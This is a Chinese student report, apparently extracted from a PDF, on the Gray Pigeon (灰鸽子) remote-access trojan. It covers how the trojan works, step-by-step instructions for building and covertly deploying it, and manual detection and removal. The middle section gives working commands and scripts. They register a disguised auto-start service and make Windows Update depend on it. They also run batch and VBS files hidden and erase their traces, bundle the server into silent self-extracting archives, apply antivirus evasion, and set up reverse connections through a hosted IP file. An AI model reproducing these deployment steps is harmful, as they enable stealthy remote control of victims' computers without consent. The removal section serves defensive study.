《关于灰鸽子的原理以及制作和清理》由会员分享,可在线阅读,更多相关《关于灰鸽子的原理以及制作和清理(7页珍藏版)》请在金锄头文库上搜索。
1、图 1“灰鸽子”攻击原理以及制作和清理院 别计算机科学与通信工程学院专 业计算机科学与技术班级学号4090511姓 名唐盼指导教师曲荣欣成 绩2012 年 6 月 7 日图 1“灰鸽子灰鸽子”攻击原理以及制作和清理攻击原理以及制作和清理一.灰鸽子简介:“灰鸽子”是一种远程控制软件. 最早出现的时候 是在模仿前辈“冰河”。 “灰鸽子”在 2001 年出现的,采用 Delphi 编写,最早并未以成品方式发布,更多的是以 技术研究的姿态,采用了源码共享的方式出现在互联网,导致”灰鸽子”迅速发展起来 .并且出现了多种不同的版本 . “灰鸽子”在出现的时候使用了当时讨论最多的 “反弹端口”连接方式,用以
2、躲避大多数个人网络防火墙的拦截。 由于服务端都以隐藏方式启动,就奠定了其恶意后门木马的地位 .而我个人就是高中时候 ,在”灰鸽子”最盛行和风靡的时候 ,开始认识”灰鸽子”和关注网络安全这个话题 .这也是我最早认识和接触到一种 黑客软件.在伴随着”灰鸽子”的盛行发展的同时 ,自己的对网络互联网安全问题的兴趣也随着同步提高 .在有关黑客攻击和防范领域过程中享受这种成就感 .但是对于”灰鸽子”的了解大多都是来自于 ,这些杂志.没有深入了学习 .但是”灰鸽子”这个概念却深入脑海 .一直伴随我成长到如今.如今虽然”灰鸽子”已经不再流行 ,但是这个在我心底有着深刻影响的软件 ,已然成了一个黑客软件的代名词
3、 .二,灰鸽子基本原理:“灰鸽子”客户端和服务端都是采用 Delphi 编写。黑客利用客户端程序配置出服务端程序。可配置的信息主要包括上线类型(如等待连接还是主动连接) 、主动连接时使用的公网 IP(域名) 、连接密码、使用的端口、启动项名称、服务名称,进程隐藏方式,使用的壳,代理,图标等等。客户端简易便捷的操作使刚入门的初学者都能充当黑客。当使用在合法情况下时,灰鸽子是一款优秀的远程控制软件。但如果拿它做一些非法的事,灰鸽子就成了很强大的黑客工具。 图 1服务端配置出来的服务端文件文件名为 G_Server.exe(这是默认的,当然也可以改变)。然后黑客利用一切办法诱骗用户运行G_Serve
4、r.exe程序。 G_Server.exe 运行后将自己拷贝到 Windows 目录下(98/xp 下为系统盘的 windows 目录,2k/NT 下为系统盘的 Winnt 目录,不支持 win7 系统.在win7 做实验没有成功 .生成的服务端不能在 win7 环境下运行 ).然后再从体内释放 G_Server.dll 和 G_Server_Hook.dll 到 windows 目录下。G_Server.exe、G_Server.dll 和 G_Server_Hook.dll 三个文件相互配合组成了灰鸽子服务端, G_Server_Hook.dll 负责隐藏灰鸽子。通过截获进程的 API 调
5、用隐藏灰鸽子的文件、服务的注册表项,甚至是进程中的模块名。截获的函数主要是用来遍历文件、遍历注册表项和遍历进程模块的一些函数。所以,有些时候用户感觉中了毒,但仔细检查却又发现不了什么异常。有些灰鸽子会多释放出一个名为 G_ServerKey.dll 的文件用来记录键盘操作。注意,G_Server.exe 这个名称并不固定,它是可以定制的,比如当定制服务端文件名为 A.exe 时,生成的文件就是 A.exe、A.dll 和 A_Hook.dll。 Windows 目录下的 G_Server.exe 文件将自己注册成服务( 9X 系统写注册表启动项),每次开机都能自动运行,运行后启动G_Serve
6、r.dll 和G_Server_Hook.dll 并自动退出。 G_Server.dll 文件实现后门功能,与控制端客户端进行通信; G_Server_Hook.dll 则通过拦截 API 调用来隐藏病毒。因此,中毒后,我们看不到病毒文件,也看不到病毒注册的服务项。随着灰鸽子服务端文件的设置不同, G_Server_Hook.dll 有时候附在Explorer.exe 的进程空间中,有时候则是附在所有进程中。三;灰鸽子制作实例步骤:准备工具:灰鸽子服务端; IcoSprite 图标更改器;SC.exe 服务添加删除更改工具; winrar 压缩软件用于捆绑生成的程序.制作过程:图 11. 首先
7、自己配置一下鸽子服务端,配置时启动项设置这里面的都不要填,不要写入注册表,也不要用服务启动。2.用 SC 创建一个服务 运行 CMD.EXE 在 system32 的目录下运行执行 SC.exe create huigezi BinPath= “%systemroot%system32gezi.exe“ type=own type= interact start= auto DisplayName= “gezi“.这句是用 SC 建立一个服务,服务名为 huigezi,路径 Binpath 为“%systemroot%system32gezi.exe“,类型 type 为 own 与 inte
8、ract 交互,启动类型 start 为自动,显示名 DisplayName 为“gezi“。sc.exe descript_ion huigezi “不死鸽子“这句是将 huigezi 服务的描改为“不死鸽子” sc config wuauserv depend= huigezi 配置 huigezi使 wuauserv 服务依存此服务(wuauserv 可以根据自己喜欢改成其它服务,这里的 wuauserv 是系统在 Windows Update 网站的自动更新服务) 。这里的目的是迷惑别人,使其不敢轻易停止我们生成的服务。3.将这些从注册表导出, 我们将他命名为 1.reg4.创建一个
9、BAT 文件,并命名为 update.bat regedit /s %systemroot%system321.reg%systemroot%system32gezi.exedel /q /f /s %systemroot%system321.regdel /q /f /s %systemroot%system32Update.vbsdel /q /f /s %systemroot%system32Update.bat5.创建一个 vbs 并命名为 update.vbs目的是为了作用是令 bat 里的内容以安静模式执行,这样就可以让 cmd窗口跳出来了,增加了不少隐蔽性.代码如下:On Err
10、or Resume Nextset wshshell=createobject (“wscript_.shell“)a=wshshell.run (“cmd.exe /C %systemroot%system32Update.bat“, 0, TRUE)图 16.用我门配置出来的服务端,并命名为 run.exe,用 run.exe 做一个自解压文件,并命名为 gezi.exe.。将解压模式为全部隐藏.解压后运行 run.exe,服务端做免杀7.将 gezi.exe , 1.reg, Update.vbs, Update.bat 再用 winrar 制作一个自解压文件,解压到%systemroo
11、t%system32 解压后运行 Update.vbs 当然解压模式依旧全部隐藏,替换同名文件.客户端控制的准备工作:1, 当然是下载灰鸽子的软件2. 申请一个免费的主页空间,因为灰鸽子是可以反弹式链接的,也就是说,服务端通过登陆你的主页的特定文件就可以主动连接到你的电脑让你控制了。3. 首先在电脑上新建一个 ip.txt 的文本文件,内容如下:http:/huigezi 111.227.252.212111.227.252.212:8000end 其中 111.227.252.212111.227.252.212 这个是我的电脑目前的 IP 地址,8000 是连接的端口,然后把这个文件上传到
12、你申请的空间,它的目的是客户端上线的话就会去这个网站读取这个文件,然后主动和我取得连接。然后运行 sunray.exe,在后然后运行 http.exe 点开始服务!最后,运行客户端,也就是 H_Client.exe 这个文件. 点击“自动上线”选项.四:清理灰鸽子一.灰鸽子的手工检测由于灰鸽子拦截了 API 调用,在正常模式下服务端程序文件和它注册的服务项均被隐藏,也就是说你即使设置了“显示所有隐藏文件”也看不到它们。此外,灰鸽子服务端的文件名也是可以自定义的,这都给手工检测带来了一定的困难。但是灰鸽子的检测仍然是有规律可循的。从上面的运行原理分析可以看出,无论自定义的服务器端文件名是什么,一
13、般都会在操作系统的安装目录下生成一个以“_hook.dll”结尾的文件。通过这一点,我们可以较为准确手工图 1检测出灰鸽子 服务端。由于正常模式下灰鸽子会隐藏自身,因此检测灰鸽子的操作一定要在安全模式下进行。进入安全模式的方法是:启动计算机,在系统进入 Windows 启动画面前,按下 F8 键(或者在启动计算机时按住 Ctrl 键不放),在出现的启动选项菜单中,选择“Safe Mode”或“安全模式” 。1、由于灰鸽子的文件本身具有隐藏属性,因此要设置 Windows 显示所有文件。打开“我的电脑” ,选择菜单“工具” “文件夹选项” ,点击“查看” ,取消“隐藏受保护的操作系统文件”前的对
14、勾,并在“隐藏文件和文件夹”项中选择“显示所有文件和文件夹” ,然后点击“确定” 。2、打开 Windows 的“搜索文件” ,文件名称输入“_hook.dll” ,搜索位置选择Windows 的安装目录(默认 98/xp 为 C:windows,2k/NT 为 C:Winnt) 。 3、经过搜索,我们在 Windows 目录(不包含子目录)下发现了一个名为Game_Hook.dll 的文件。4、根据灰鸽子原理分析我们知道,如果 Game_Hook.DLL 是灰鸽子的文件,则在操作系统安装目录下还会有 Game.exe 和 Game.dll 文件。打开 Windows 目录,果然有这两个文件,
15、同时还有一个用于记录键盘操作的 GameKey.dll 文件。经过这几步操作我们基本就可以确定这些文件是灰鸽子 服务端了,下面就可以进行手动清除。二、灰鸽子的手工清除经过上面的分析,清除灰鸽子就很容易了。清除灰鸽子仍然要在安全模式下操作,主要有两步:1、清除灰鸽子的服务;2 删除灰鸽子程序文件。但是为了防止误操作,清除前做好备份。(一) 、清除灰鸽子的服务注意清除灰鸽子的服务一定要在注册表里完成,清除灰鸽子的服务一定要先备份注册表,或者到纯 DOS 下将注册表文件更名,然后在去注册表删除灰鸽子的服务。因为病毒会和 EXE 文件进行关联 2000XP 系统:1、打开注册表编辑器(点击“开始” “
16、运行” ,输入“Regedit.exe” ,确定。 ) ,打开 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices 注册表项。2、点击菜单“编辑” “查找” , “查找目标”输入“game.exe” ,点击确定,图 1我们就可以找到灰鸽子的服务项(此例为 Game_Server,每个人这个服务项名称是不同的) 。 3、删除整个 Game_Server 项。98me 系统:在 9X 下,灰鸽子启动项只有一个,因此清除更为简单。运行注册表编辑器,打开 HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun项,我们立即看到名为 Game.exe 的一项,将 Game.exe 项删除即可。(二) 、删除灰鸽子程序文件删除灰鸽子程序文件非常简单,只需要在安全模式下删除 Windows 目录下的 Game.exe、Game.dll、Game_Hook.dll
